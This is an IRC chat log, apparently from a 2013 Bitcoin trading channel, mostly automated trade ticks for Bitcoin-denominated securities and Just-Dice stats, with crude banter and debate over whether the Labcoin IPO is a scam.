no Sep 29 04:46:02 lol Sep 29 04:46:13 spicoin Sep 29 04:46:13 gangplank: but it includes ALL colors :P Sep 29 04:46:14 ha! Sep 29 04:46:34 chsados white isn't a color. Sep 29 04:46:44 its the lack of color? Sep 29 04:47:35 excellent material for trilema is going down now in #labcoin and the labcoin bitcointalk thread Sep 29 04:48:37 paste summary here ifs its any good Sep 29 04:48:41 ^ Sep 29 04:50:10 [HAVELOCK] [CBTC] 10001 @ 0.00032624 = 3.2627 BTC [+] {3} Sep 29 04:50:35 https://bitcointalk.org/index.php?topic=263445.msg3258316#msg3258316 Sep 29 04:50:41 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 29 04:51:39 so apparently Sep 29 04:51:52 A proper Q/A session will be held tomorrow on irc to clear all questions. I will give here notice of the starting time. Sep 29 04:51:56 -labcoin Sep 29 04:52:12 [BTCTC] [LABCOIN] 10000 @ 0.00036126 = 3.6126 BTC [+] {3} Sep 29 04:52:31 bah fck it it's too weird, just read pgs 790-801 in the labcoin thread if you want to piece it together Sep 29 04:53:13 [BTCTC] [LABCOIN] 703 @ 0.000363 = 0.2552 BTC [+] Sep 29 04:53:28 lol Sep 29 04:53:30 11 pages Sep 29 04:53:41 http://trilema.com/2013/real-men-cabling/ Sep 29 04:53:45 Real men cabling pe Trilema - Un blog de Mircea Popescu. Sep 29 04:53:46 lol how would you summarize all that dex? Sep 29 04:54:15 haha i don't know.. :) you are right with the pages, but it's almost crazy Sep 29 04:55:15 [BTCTC] [LABCOIN] 9297 @ 0.000363 = 3.3748 BTC [+] Sep 29 04:56:01 romaaaaania Sep 29 04:56:09 omg Sep 29 04:56:25 ill remember of that pic each time mp ping timeouts Sep 29 04:56:41 i ams impressed Sep 29 04:56:44 dat infrastructure! Sep 29 04:56:54 dose humans making decisions! Sep 29 04:57:14 watch and learn bois. Sep 29 04:57:32 ? Sep 29 04:58:12 this is how real men cable! Sep 29 04:58:35 pankkake, you posted a jacked up gif of some japanese dude slamming his cock into people. Can you repost? Sep 29 04:58:46 It was a fight scene. Sep 29 04:59:02 lol kleeck was sio busy jacking in he forgot to save it for later jacking Sep 29 04:59:07 Exactly Sep 29 04:59:13 Must see cock slam! Sep 29 04:59:35 This is, by far, the strangest thing I've climbed through my browser history to find. Sep 29 04:59:46 more preorder companies Sep 29 04:59:47 https://bitcointalk.org/index.php?topic=304338.0 Sep 29 04:59:50 SudoMine, LLC Distributed Computing Division Sep 29 04:59:56 also poorly specified shit. Sep 29 05:00:00 kakobrekla seems bitbet will not be running out of bets. Sep 29 05:00:01 mircea_popescu: so has mpex technically been hacked or can you still say, "Never been hacked" Sep 29 05:00:07 also taking usd money fail Sep 29 05:00:07 pseudo-mine Sep 29 05:00:39 Urushiol: ding ding ding Sep 29 05:00:46 thestringpuller well i dunno, but i won't bother with it cvause it's too contentious Sep 29 05:00:55 kakobrekla: "also poorly specified shit." Kleeck: I don't remember that Sep 29 05:01:02 good answer :D Sep 29 05:01:02 $email Sep 29 05:01:04 mircea_popescu: No new messages received. Sep 29 05:01:14 much better than my other inbox. Sep 29 05:01:16 I'll never be satisfied again... Sep 29 05:01:28 seriously though, do people not think about names when it comes to things like that? pseudo mine? peepee coin? Sep 29 05:01:32 smickles: you know it Sep 29 05:01:50 mircea_popescu: thats the service, garunteed 'inbox 0' Sep 29 05:02:23 http://3guys1movie.com/wp-content/uploads/2013/09/Cameron-DIaz-GIF-underwear.gif Sep 29 05:02:32 Kleeck ^ and repent your sinful backwards ways. Sep 29 05:02:55 Ugh. Cameron Diaz is so fuckin' annoying. Sep 29 05:03:06 haha Sep 29 05:03:06 That .gif made me mad. Sep 29 05:03:18 what's she do, she slurp her food loudly ? Sep 29 05:03:20 never found her attractive. though I like her in the gif Sep 29 05:03:27 she's energetic. always good. Sep 29 05:03:32 her whole personality needs to be destroyed. Sep 29 05:03:50 I don't like energetic. Not like that. Sep 29 05:04:06 you don't have a romanian datacenter which needs backup power either. Sep 29 05:04:16 That's true. Sep 29 05:04:25 [BTCTC] [BASIC-MINING] 20 @ 0.0467705 = 0.9354 BTC [-] {4} Sep 29 05:04:30 I have an American data center that DOES have backup power. :) Sep 29 05:04:57 and backup nsa too. Sep 29 05:05:05 nas? Sep 29 05:05:17 lollercakes Sep 29 05:05:26 [BTCTC] [PETA-MINE] 7 @ 0.52204285 = 3.6543 BTC [-] {3} Sep 29 05:05:27 ;;lucky nsa Sep 29 05:05:28 http://www.nsa.gov/ Sep 29 05:05:30 Welcome to the National Security Agency - NSA/CSS Sep 29 05:05:36 CSS!!! Sep 29 05:05:36 national storage association Sep 29 05:05:40 omfg i knew it. I KNEW IT Sep 29 05:05:44 lol Sep 29 05:05:45 css did 9/11. Sep 29 05:06:26 [BTCTC] [LABCOIN] 2500 @ 0.00038054 = 0.9514 BTC [+] {2} Sep 29 05:06:43 that is a low quantity of price. Sep 29 05:07:27 [BTCTC] [FN] [DMS.SELLING] 495 @ 0.00499998 = 2.475 BTC [+] {2} Sep 29 05:09:29 [BTCTC] [LABCOIN] 3182 @ 0.00038095 = 1.2122 BTC [+] {2} Sep 29 05:09:40 no such agency Sep 29 05:10:30 [BTCTC] [LABCOIN] 5000 @ 0.00040988 = 2.0494 BTC [+] {2} Sep 29 05:14:05 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/#c1497 Sep 29 05:14:09 lol Sep 29 05:14:12 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 29 05:18:25 "idempotent" < TIL Sep 29 05:18:38 [BTCTC] [LABCOIN] 1598 @ 0.000423 = 0.676 BTC [+] Sep 29 05:21:41 [BTCTC] [LABCOIN] 500 @ 0.00043 = 0.215 BTC [+] Sep 29 05:22:12 IKR Sep 29 05:23:43 [BTCTC] [LABCOIN] 1100 @ 0.0004299 = 0.4729 BTC [-] {2} Sep 29 05:26:41 meanie Sep 29 05:31:30 http://www.dailymail.co.uk/news/article-2436551/A-weatherman-breaks-tears-vows-NEVER-fly-grim-climate-change-report.html Sep 29 05:31:35 A weatherman breaks down in tears and vows NEVER to fly again due to grim climate-change report | M Sep 29 05:31:42 o look, an emo vegan wanting to get a vasectomy Sep 29 05:31:50 i'm supposed to believe this is somehow related to the weather. Sep 29 05:36:29 smickles ok, if you must : i learn that word in 7th grade, we were doing group theory. Sep 29 05:36:33 (tru story) Sep 29 05:41:19 so apparently labcoin might be scam Sep 29 05:41:27 no wai Sep 29 05:41:28 i vote scam 100x Sep 29 05:41:44 because it's like coinlab reverse Sep 29 05:47:28 meh i did t he work for nothing, log is the bash already. Sep 29 05:47:57 nothing but sarcastaball inhere Sep 29 05:52:06 https://bitcointalk.org/index.php?topic=304365.0 Sep 29 05:52:11 Collection of questions for the allegedly upcoming Labcoin Q&A session Sep 29 05:52:12 [BTCTC] [LABCOIN] 603 @ 0.000419 = 0.2527 BTC [+] Sep 29 05:52:12 [BTCTC] [BTC-BOND] 100 @ 0.0099 = 0.99 BTC [+] Sep 29 05:55:15 [BTCTC] [LABCOIN] 1897 @ 0.00042 = 0.7967 BTC [+] {2} Sep 29 06:04:24 [BTCTC] [LABCOIN] 2326 @ 0.00038157 = 0.8875 BTC [-] {3} Sep 29 06:15:35 [BTCTC] [B] [CIPHERMINE.B1] 17 @ 0.00930282 = 0.1581 BTC [+] {2} Sep 29 06:17:37 [BTCTC] [B] [CIPHERMINE.B1] 271 @ 0.00979963 = 2.6557 BTC [+] {2} Sep 29 06:21:41 [BTCTC] [ASICMINER-PT] 1 @ 1.431 BTC [+] Sep 29 06:21:41 [BTCTC] [LABCOIN] 9995 @ 0.00040993 = 4.0973 BTC [+] {6} Sep 29 06:22:42 [BTCTC] [LABCOIN] 8159 @ 0.00042856 = 3.4966 BTC [+] {3} Sep 29 06:27:47 [BTCTC] [LABCOIN] 3046 @ 0.00042603 = 1.2977 BTC [-] {2} Sep 29 06:28:48 [BTCTC] [LABCOIN] 5000 @ 0.0004202 = 2.101 BTC [-] {3} Sep 29 06:29:49 [BTCTC] [LABCOIN] 4716 @ 0.0004533 = 2.1378 BTC [+] {6} Sep 29 06:31:51 [BTCTC] [LABCOIN] 10641 @ 0.00047698 = 5.0755 BTC [+] {13} Sep 29 06:42:01 [BTCTC] [LABCOIN] 1234 @ 0.00043025 = 0.5309 BTC [-] {2} Sep 29 06:48:07 [HAVELOCK] [AM1] 1 @ 1.47979998 BTC [+] Sep 29 06:49:08 [HAVELOCK] [AM1] 1 @ 1.47979998 BTC [+] Sep 29 06:52:11 [BTCTC] [LABCOIN] 3000 @ 0.0004227 = 1.2681 BTC [-] {3} Sep 29 06:53:12 [BTCTC] [LABCOIN] 2500 @ 0.00040583 = 1.0146 BTC [-] {4} Sep 29 06:59:18 [BTCTC] [BTC-TRADING-PT] 9 @ 0.056 = 0.504 BTC [+] Sep 29 07:07:27 [BTCTC] [FN] [DMS.SELLING] 4314 @ 0.00486402 = 20.9834 BTC [-] {2} Sep 29 07:11:31 [BTCTC] [LABCOIN] 552 @ 0.000439 = 0.2423 BTC [+] Sep 29 07:16:35 [BTCTC] [ACTIVEMINING] 3500 @ 0.00145291 = 5.0852 BTC [+] {7} Sep 29 07:19:38 [BTCTC] [LABCOIN] 1382 @ 0.00040034 = 0.5533 BTC [-] {2} Sep 29 07:20:39 [BTCTC] [LABCOIN] 846 @ 0.0004001 = 0.3385 BTC [-] Sep 29 07:23:42 [BTCTC] [LABCOIN] 5018 @ 0.00042899 = 2.1527 BTC [+] {5} Sep 29 07:27:46 [BTCTC] [LABCOIN] 3904 @ 0.00040216 = 1.57 BTC [-] {7} Sep 29 07:28:47 [BTCTC] [LABCOIN] 589 @ 0.0004 = 0.2356 BTC [-] Sep 29 07:30:49 [BTCTC] [LABCOIN] 2918 @ 0.000391 = 1.1409 BTC [-] Sep 29 07:31:50 [BTCTC] [LABCOIN] 15000 @ 0.0003901 = 5.8515 BTC [-] {2} Sep 29 07:33:52 [BTCTC] [LABCOIN] 10000 @ 0.0003831 = 3.831 BTC [-] Sep 29 07:33:52 [BTCTC] [ASICMINER-PT] 5 @ 1.4278 = 7.139 BTC [-] {3} Sep 29 07:34:53 [BTCTC] [LABCOIN] 15900 @ 0.00036996 = 5.8824 BTC [-] {5} Sep 29 07:34:53 [BTCTC] [ACTIVEMINING] 1500 @ 0.001469 = 2.2035 BTC [+] Sep 29 07:35:54 [BTCTC] [LABCOIN] 3126 @ 0.000365 = 1.141 BTC [-] Sep 29 07:38:57 [BTCTC] [LABCOIN] 1025 @ 0.000366 = 0.3752 BTC [+] Sep 29 07:39:58 [BTCTC] [LABCOIN] 5125 @ 0.000365 = 1.8706 BTC [-] Sep 29 07:44:03 [BTCTC] [ACTIVEMINING] 2485 @ 0.001469 = 3.6505 BTC [+] Sep 29 07:47:06 [BTCTC] [ACTIVEMINING] 1500 @ 0.0015 = 2.25 BTC [+] {2} Sep 29 07:53:09 mircea_popescu: yeah, but your language is almost latin anyway :P Sep 29 07:54:26 well now this is true. Sep 29 07:56:15 [HAVELOCK] [AM100] 69 @ 0.01390144 = 0.9592 BTC [-] {4} Sep 29 07:57:16 [BTCTC] [LABCOIN] 9001 @ 0.00034311 = 3.0883 BTC [-] {3} Sep 29 07:57:53 https://www.dropbox.com/s/xkkipfgeg1zyzg0/Free-Kentteth%20E.%20Slaughter%20Interview.mp3 Sep 29 07:59:44 summary ? Sep 29 08:00:27 amazing ... Sep 29 08:00:28 AMAZING COMPANY! Sep 29 08:00:35 sec there is a transcript Sep 29 08:03:48 can't find it, might be deleted (in the moderated thread) Sep 29 08:03:55 summary: just some pr talk, nothing new Sep 29 08:05:06 aij Sep 29 08:05:08 aok* Sep 29 08:08:27 [BTCTC] [ACTIVEMINING] 634 @ 0.00161457 = 1.0236 BTC [+] {2} Sep 29 08:15:34 [HAVELOCK] [AM100] 10 @ 0.01381001 = 0.1381 BTC [-] Sep 29 08:20:19 Ukyo, labcoin are claiming they are working with you to get listed on bitfunder, surely you wouldnt list them? Sep 29 08:22:41 [BTCTC] [LABCOIN] 900 @ 0.00035 = 0.315 BTC [-] Sep 29 08:23:41 [BTCTC] [ASICMINER-PT] 23 @ 1.42517391 = 32.779 BTC [-] {3} Sep 29 08:24:42 [BTCTC] [ASICMINER-PT] 20 @ 1.42049999 = 28.41 BTC [-] {5} Sep 29 08:27:45 [BTCTC] [LABCOIN] 13928 @ 0.00034812 = 4.8486 BTC [-] {5} Sep 29 08:32:34 bobbabad, he has said many times they have to mett bf criteria to be listed Sep 29 08:32:44 he's not "just listing " them Sep 29 08:34:05 well consider all the bs that is going on he should just publicly take a stance and post that bitfunder doesnt do allow known scammer on its platform Sep 29 08:35:37 that's nonsense. Sep 29 08:36:56 are you saying thathe does, mircea_popescu? Sep 29 08:38:29 http://i.imgur.com/SJ47B8d.png ;) Sep 29 08:39:58 [BTCTC] [LABCOIN] 5140 @ 0.00035 = 1.799 BTC [+] Sep 29 08:40:27 benkay i am saying that you can't be "taking public stances" like that. Sep 29 08:41:15 bobbabad, do you have information to prove they are scammers? seems the jury is still out on that Sep 29 08:42:45 mircea_popescu, so you think its ok that labcoin guys are pumping investors by saying that they are in talks with bitfunder to get listed? Sep 29 08:43:04 well as far as that goes, ukto can say something. factual. Sep 29 08:43:05 bobbabad: who says they arnt? Sep 29 08:43:08 latest summary: http://www.reddit.com/r/BitcoinStocks/comments/1ncdf1/labcoin_outed_as_a_scam/ Sep 29 08:43:21 they are in talks, there is no garuntee they will be listed tho... the nature of business, often businesses talk... Sep 29 08:43:23 Ukyo, thats what I asked originally Sep 29 08:43:24 all they have said is their intention to list on BF Sep 29 08:43:25 that is that. Sep 29 08:43:38 I have no comment on anything related to the subject as of this time. Sep 29 08:44:34 Public fact is that many many days ago they stated they would list on BitFunder. As of this point, they are not listed on BitFunder. Sep 29 08:44:38 Those are public facts. Sep 29 08:44:55 Anything above/beyond/between is pure speculation. Sep 29 08:46:35 Also public fact, is that to date, BitFunder has not listed any assets that are "moving" from btct. Sep 29 08:46:51 So speculate all you want. :) Sep 29 08:50:08 [HAVELOCK] [AM100] 7 @ 0.01449 = 0.1014 BTC [+] {2} Sep 29 09:11:29 [BTCTC] [LABCOIN] 2257 @ 0.0003501 = 0.7902 BTC [-] Sep 29 09:12:31 [BTCTC] [LABCOIN] 10343 @ 0.00036901 = 3.8167 BTC [+] {5} Sep 29 09:13:32 [BTCTC] [LABCOIN] 1500 @ 0.00035 = 0.525 BTC [-] Sep 29 09:27:45 [BTCTC] [LABCOIN] 829 @ 0.00035135 = 0.2913 BTC [-] {3} Sep 29 09:39:57 [HAVELOCK] [AM100] 1056 @ 0.01366151 = 14.4266 BTC [-] {11} Sep 29 09:40:58 [HAVELOCK] [AM100] 192 @ 0.0135 = 2.592 BTC [-] Sep 29 09:41:59 [HAVELOCK] [AM100] 66 @ 0.01353333 = 0.8932 BTC [+] {2} Sep 29 09:45:02 [HAVELOCK] [B] [XBOND] 2500 @ 0.001127 = 2.8175 BTC [-] {13} Sep 29 09:54:11 [BTCTC] [LABCOIN] 146639 @ 0.00031628 = 46.379 BTC [-] {32} Sep 29 10:05:22 [BTCTC] [BTC-TRADING-PT] 5 @ 0.05 = 0.25 BTC [-] Sep 29 10:05:23 [BTCTC] [LABCOIN] 79790 @ 0.0002826 = 22.5487 BTC [-] {13} Sep 29 10:06:23 [BTCTC] [LABCOIN] 181516 @ 0.00025112 = 45.5823 BTC [-] {17} Sep 29 10:12:30 [BTCTC] [LABCOIN] 1154 @ 0.000308 = 0.3554 BTC [+] Sep 29 10:14:32 [BTCTC] [LABCOIN] 600 @ 0.000308 = 0.1848 BTC [+] Sep 29 10:14:32 [HAVELOCK] [AM1] 1 @ 1.4798 BTC [+] Sep 29 10:16:34 [BTCTC] [LABCOIN] 3000 @ 0.00030836 = 0.9251 BTC [+] {2} Sep 29 10:18:36 [BTCTC] [LABCOIN] 1157 @ 0.00027661 = 0.32 BTC [+] {2} Sep 29 10:36:54 [BTCTC] [LABCOIN] 7602 @ 0.00032552 = 2.4746 BTC [+] {8} Sep 29 10:50:07 [BTCTC] [ASICMINER-PT] 1 @ 1.42 BTC [-] Sep 29 11:04:21 [BTCTC] [ASICMINER-PT] 7 @ 1.419 = 9.933 BTC [-] {2} Sep 29 11:07:24 [HAVELOCK] [B] [XBOND] 243 @ 0.00111 = 0.2697 BTC [-] Sep 29 11:13:02 https://s3.amazonaws.com/images.slideshare/test-130919165027-phpapp01%2F95%2Fslide-5-1024.jpg?Signature=c71AUdPvB6igCcnTWmx74owLuqk%3D&Expires=1380441325&AWSAccessKeyId=AKIAIW74DRRRQSO4NIKA Sep 29 11:13:14 oh nvm Sep 29 11:29:46 [BTCTC] [LABCOIN] 5000 @ 0.00029893 = 1.4947 BTC [-] {5} Sep 29 11:33:50 [BTCTC] [BTC-TRADING-PT] 20 @ 0.03512 = 0.7024 BTC [-] Sep 29 11:42:59 [BTCTC] [LABCOIN] 4132 @ 0.00028065 = 1.1596 BTC [-] {4} Sep 29 11:45:01 [BTCTC] [ASICMINER-PT] 20 @ 1.40449999 = 28.09 BTC [-] {6} Sep 29 12:01:18 [BTCTC] [ACTIVEMINING] 72 @ 0.00143 = 0.103 BTC [-] Sep 29 12:07:24 [BTCTC] [FN] [BTC-GROWTH] 5 @ 0.082 = 0.41 BTC [-] Sep 29 12:18:35 [BTCTC] [LABCOIN] 1615 @ 0.000299 = 0.4829 BTC [+] {2} Sep 29 12:26:42 [BTCTC] [LABCOIN] 2693 @ 0.0003 = 0.8079 BTC [+] Sep 29 12:27:43 [BTCTC] [LABCOIN] 31691 @ 0.00034241 = 10.8513 BTC [+] {9} Sep 29 12:30:46 [BTCTC] [RSM] 60 @ 0.00448877 = 0.2693 BTC [+] {3} Sep 29 12:50:05 [BTCTC] [LABCOIN] 1379 @ 0.000359 = 0.4951 BTC [+] Sep 29 12:52:07 [BTCTC] [LABCOIN] 1000 @ 0.0003206 = 0.3206 BTC [-] {2} Sep 29 12:54:10 [BTCTC] [LABCOIN] 607 @ 0.000359 = 0.2179 BTC [+] Sep 29 12:56:12 [BTCTC] [LABCOIN] 20640 @ 0.0003669 = 7.5728 BTC [+] {5} Sep 29 12:59:15 [BTCTC] [LABCOIN] 575 @ 0.000341 = 0.1961 BTC [-] Sep 29 13:00:16 [BTCTC] [LABCOIN] 22374 @ 0.00037 = 8.2784 BTC [+] Sep 29 13:12:28 [BTCTC] [FN] [BTC-GROWTH] 205 @ 0.07822058 = 16.0352 BTC [-] {2} Sep 29 13:27:43 [BTCTC] [LABCOIN] 946 @ 0.00032267 = 0.3052 BTC [-] {2} Sep 29 13:29:45 [BTCTC] [LABCOIN] 580 @ 0.0003222 = 0.1869 BTC [-] Sep 29 13:32:48 [BTCTC] [DMS.MINING] 270 @ 0.00116 = 0.3132 BTC [-] Sep 29 13:34:39 Any updates for mpex being live yet? Sep 29 13:36:36 TATbro it's all ready. will be live at noon. Sep 29 13:36:52 [BTCTC] [BASIC-MINING] 15 @ 0.0469 = 0.7035 BTC [+] {2} Sep 29 13:36:57 Great thx Sep 29 13:38:54 [HAVELOCK] [VTX] 1 @ 0.51211 BTC [-] Sep 29 13:39:55 [HAVELOCK] [VTX] 5 @ 0.5121 = 2.5605 BTC [-] Sep 29 13:49:05 [BTCTC] [KENILWORTH] 899 @ 0.0014 = 1.2586 BTC [+] Sep 29 13:56:12 [BTCTC] [LABCOIN] 4998 @ 0.00031244 = 1.5616 BTC [-] {5} Sep 29 13:57:12 [BTCTC] [LABCOIN] 962 @ 0.00031 = 0.2982 BTC [-] Sep 29 13:58:13 [BTCTC] [LABCOIN] 1927 @ 0.00031014 = 0.5976 BTC [+] {3} Sep 29 14:01:16 [BTCTC] [LABCOIN] 11088 @ 0.00028969 = 3.2121 BTC [-] {11} Sep 29 14:02:17 [BTCTC] [ASICMINER-PT] 9 @ 1.40066666 = 12.606 BTC [-] {3} Sep 29 14:02:17 [BTCTC] [BTC-BOND] 242 @ 0.0099 = 2.3958 BTC [+] Sep 29 14:05:31 https://bitcointalk.org/index.php?topic=68329.msg3258523#msg3258523 MPOE-PR third most ignored user Sep 29 14:05:40 [Feature added] Color besides usernames for Ignored by % of established members. Sep 29 14:05:50 lol Sep 29 14:06:02 i'd have thought she;'d be 1st Sep 29 14:06:15 it's pretty much a badge of honor these days. Sep 29 14:06:55 wasn't smoothie an admin ? Sep 29 14:07:02 or am i confusing nuts. Sep 29 14:08:23 [BTCTC] [LABCOIN] 10917 @ 0.00032784 = 3.579 BTC [+] {7} Sep 29 14:09:24 [BTCTC] [LABCOIN] 450 @ 0.000339 = 0.1526 BTC [+] Sep 29 14:10:10 not too sure, that swamp will give you intellectual malaria methinks Sep 29 14:10:46 but alas, a good source of lulz Sep 29 14:11:18 https://bitcointalk.org/index.php?topic=222565.msg3259197#msg3259197 "After a lot of deliberation I've decided to close down Sandstorm" Sep 29 14:11:22 SANDSTORM: - A Collective Investment Vehicle for BTC. - Sep 29 14:14:29 [BTCTC] [LABCOIN] 4184 @ 0.00030297 = 1.2676 BTC [-] {3} Sep 29 14:25:40 [BTCTC] [LABCOIN] 1000 @ 0.00031 = 0.31 BTC [-] Sep 29 14:26:31 how long can a nearly dead cat bounce? Sep 29 14:29:44 [BTCTC] [LABCOIN] 1213 @ 0.00031 = 0.376 BTC [-] Sep 29 14:32:47 [BTCTC] [LABCOIN] 9655 @ 0.00028033 = 2.7066 BTC [-] {6} Sep 29 14:35:50 [BTCTC] [LABCOIN] 4121 @ 0.00026208 = 1.08 BTC [-] {4} Sep 29 14:40:55 [BTCTC] [LABCOIN] 20000 @ 0.000261 = 5.22 BTC [-] Sep 29 14:53:37 do any of you use WebPG? I think it was the one slowing down my firefox to death Sep 29 15:00:15 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 29 15:24:39 [BTCTC] [ACTIVEMINING] 400 @ 0.001515 = 0.606 BTC [-] Sep 29 15:25:40 [BTCTC] [LABCOIN] 12403 @ 0.00026175 = 3.2465 BTC [+] {4} Sep 29 15:29:43 [BTCTC] [BITVPS] 343 @ 0.001109 = 0.3804 BTC [-] Sep 29 15:35:49 [BTCTC] [ACTIVEMINING] 648 @ 0.00161464 = 1.0463 BTC [+] {2} Sep 29 15:36:50 [BTCTC] [ACTIVEMINING] 229 @ 0.001615 = 0.3698 BTC [+] Sep 29 15:40:55 [BTCTC] [LABCOIN] 27568 @ 0.00026072 = 7.1875 BTC [-] {3} Sep 29 15:40:55 [BTCTC] [CRYPTO-TRADE] 3 @ 0.17 = 0.51 BTC [-] Sep 29 15:41:56 [BTCTC] [LABCOIN] 4293 @ 0.00026076 = 1.1194 BTC [+] {2} Sep 29 15:41:56 [BTCTC] [BASIC-MINING] 31 @ 0.04682225 = 1.4515 BTC [-] {2} Sep 29 15:42:57 [BTCTC] [COGNITIVE] 4 @ 0.111 = 0.444 BTC [-] Sep 29 15:43:58 [BTCTC] [LABCOIN] 3512 @ 0.00028957 = 1.017 BTC [+] {3} Sep 29 15:44:59 [BTCTC] [LABCOIN] 1170 @ 0.000299 = 0.3498 BTC [+] Sep 29 15:47:01 [BTCTC] [LABCOIN] 11400 @ 0.00026492 = 3.0201 BTC [-] {8} Sep 29 15:48:02 [BTCTC] [LABCOIN] 1463 @ 0.00027633 = 0.4043 BTC [+] {2} Sep 29 15:55:09 [BTCTC] [LABCOIN] 1034 @ 0.000258 = 0.2668 BTC [-] Sep 29 15:57:11 [BTCTC] [LABCOIN] 4020 @ 0.00028061 = 1.1281 BTC [+] {4} Sep 29 16:12:26 [BTCTC] [BITVPS] 1507 @ 0.00100804 = 1.5191 BTC [-] {7} Sep 29 16:13:27 [BTCTC] [BITVPS] 1200 @ 0.000901 = 1.0812 BTC [-] Sep 29 16:13:28 [BTCTC] [ASICMINER-PT] 2 @ 1.401 = 2.802 BTC [+] {2} Sep 29 16:15:30 [BTCTC] [LABCOIN] 10004 @ 0.00025687 = 2.5697 BTC [-] {7} Sep 29 16:17:32 [BTCTC] [LABCOIN] 3550 @ 0.00028442 = 1.0097 BTC [+] {2} Sep 29 16:17:32 [BTCTC] [ASICMINER-PT] 2 @ 1.401 = 2.802 BTC [+] Sep 29 16:19:34 [BTCTC] [LABCOIN] 5056 @ 0.00028993 = 1.4659 BTC [+] {4} Sep 29 16:20:35 [BTCTC] [LABCOIN] 1270 @ 0.00028 = 0.3556 BTC [-] Sep 29 16:21:36 [BTCTC] [B.YABMC] 1068 @ 0.00032541 = 0.3475 BTC [-] {4} Sep 29 16:22:37 [BTCTC] [LABCOIN] 1200 @ 0.000289 = 0.3468 BTC [+] Sep 29 16:29:44 [BTCTC] [LABCOIN] 4976 @ 0.00026094 = 1.2984 BTC [-] {6} Sep 29 16:32:46 [BTCTC] [ASICMINER-PT] 1 @ 1.401 BTC [+] Sep 29 16:32:46 [HAVELOCK] [AM100] 8 @ 0.01342325 = 0.1074 BTC [-] {2} Sep 29 16:33:47 [HAVELOCK] [AM100] 9 @ 0.01302 = 0.1172 BTC [-] Sep 29 16:36:50 [BTCTC] [LABCOIN] 5483 @ 0.00025859 = 1.4178 BTC [-] {8} Sep 29 16:37:51 [BTCTC] [LABCOIN] 2098 @ 0.0002884 = 0.6051 BTC [+] {2} Sep 29 16:39:53 [BTCTC] [LABCOIN] 1000 @ 0.0002888 = 0.2888 BTC [+] Sep 29 16:41:55 [BTCTC] [LABCOIN] 1679 @ 0.00028899 = 0.4852 BTC [+] {2} Sep 29 16:43:57 [MPEX] [TEST] 987654321 @ 1.23456789 = 1219326311.1264 BTC Sep 29 16:46:16 lol wat Sep 29 16:46:18 test Sep 29 16:48:01 [BTCTC] [LABCOIN] 1538 @ 0.00027943 = 0.4298 BTC [-] {2} Sep 29 16:48:36 !jd Sep 29 16:48:38 Just-Dice stat: 1380 BTC profit, 46.3k BTC invested, 144.01 mio bets, 2.29 mio BTC wagered Sep 29 16:48:48 back on track i see Sep 29 16:48:55 nice Sep 29 16:49:02 [MPEX] [S.MPOE] 7500 @ 0.0007725 = 5.7938 BTC [-] Sep 29 16:50:03 [BTCTC] [BASIC-MINING] 18 @ 0.04665166 = 0.8397 BTC [-] {4} Sep 29 16:51:03 !jd Sep 29 16:51:04 I'm still at −20% profit :/ Sep 29 16:51:06 Just-Dice stat: 788 BTC profit, 45.8k BTC invested, 144.01 mio bets, 2.29 mio BTC wagered Sep 29 16:51:35 -20 % ?! Sep 29 16:51:54 wait. it just changed from 1400 to 800 in 3 minutes ? Sep 29 16:52:02 apparently Sep 29 16:52:05 I've almost never been up actually - just had the worst timings Sep 29 16:52:05 [BTCTC] [COGNITIVE] 5 @ 0.111 = 0.555 BTC [-] Sep 29 16:52:06 !jd Sep 29 16:52:06 Just-Dice stat: 722 BTC profit, 45.7k BTC invested, 144.01 mio bets, 2.29 mio BTC wagered Sep 29 16:52:19 told you this thing is wild Sep 29 16:53:03 well, there's someone doing 132 BTC bets Sep 29 16:55:09 [BTCTC] [ASICMINER-PT] 1 @ 1.401 BTC [+] Sep 29 16:55:51 It went from -1000 to +5000 to -500 to this within a Sep 29 16:55:58 few hours Sep 29 16:59:48 !jd Sep 29 16:59:49 Just-Dice stat: 582 BTC profit, 45.4k BTC invested, 144.01 mio bets, 2.30 mio BTC wagered Sep 29 17:03:11 !jd Sep 29 17:03:16 [BTCTC] [LABCOIN] 8499 @ 0.00028846 = 2.4516 BTC [+] {4} Sep 29 17:03:17 !jd Sep 29 17:03:19 Just-Dice stat: 1350 BTC profit, 45.9k BTC invested, 144.02 mio bets, 2.31 mio BTC wagered Sep 29 17:03:28 someone should make a dice site that lets you bet on the !jd result Sep 29 17:03:31 Just-Dice stat: 1334 BTC profit, 45.8k BTC invested, 144.02 mio bets, 2.31 mio BTC wagered Sep 29 17:03:41 !jd Sep 29 17:03:42 Just-Dice stat: 1697 BTC profit, 46.2k BTC invested, 144.02 mio bets, 2.31 mio BTC wagered Sep 29 17:04:18 [BTCTC] [LABCOIN] 2750 @ 0.00029167 = 0.8021 BTC [+] {2} Sep 29 17:06:11 couldn't assbot report wild jd swings by itself? Sep 29 17:06:38 prolly too much hassle to keep track Sep 29 17:06:52 Moves too fast Sep 29 17:07:21 [BTCTC] [LABCOIN] 1443 @ 0.00029 = 0.4185 BTC [-] Sep 29 17:07:44 i think it would be just too spammy no? Sep 29 17:07:46 !jd Sep 29 17:07:49 Just-Dice stat: 1526 BTC profit, 46.0k BTC invested, 144.02 mio bets, 2.31 mio BTC wagered Sep 29 17:08:04 assbot is spammy anyway Sep 29 17:08:14 fuck ye! Sep 29 17:08:16 kinda spammy yea Sep 29 17:08:25 well, I unignored it here because sometimes I was missing context Sep 29 17:08:49 /nick context Sep 29 17:08:52 "Our motto is over promise never deliver." Sep 29 17:09:15 is a good name Sep 29 17:09:20 "con" and "text" Sep 29 17:09:23 [BTCTC] [ASICMINER-PT] 21 @ 1.3728095 = 28.829 BTC [-] {11} Sep 29 17:09:37 so srsly, did anyone get a knc miner so far ? Sep 29 17:10:24 [HAVELOCK] [VTX] 3 @ 0.51200101 = 1.536 BTC [-] Sep 29 17:13:19 *tumbleweed* Sep 29 17:13:27 [BTCTC] [LABCOIN] 654 @ 0.00028296 = 0.1851 BTC [-] {2} Sep 29 17:13:35 heh. Sep 29 17:14:28 [BTCTC] [LABCOIN] 3567 @ 0.00027294 = 0.9736 BTC [-] {3} Sep 29 17:16:30 [BTCTC] [LABCOIN] 2556 @ 0.00027019 = 0.6906 BTC [-] {2} Sep 29 17:17:31 [BTCTC] [LABCOIN] 661 @ 0.00027431 = 0.1813 BTC [+] {2} Sep 29 17:19:36 !jd Sep 29 17:19:37 Just-Dice stat: 2206 BTC profit, 45.9k BTC 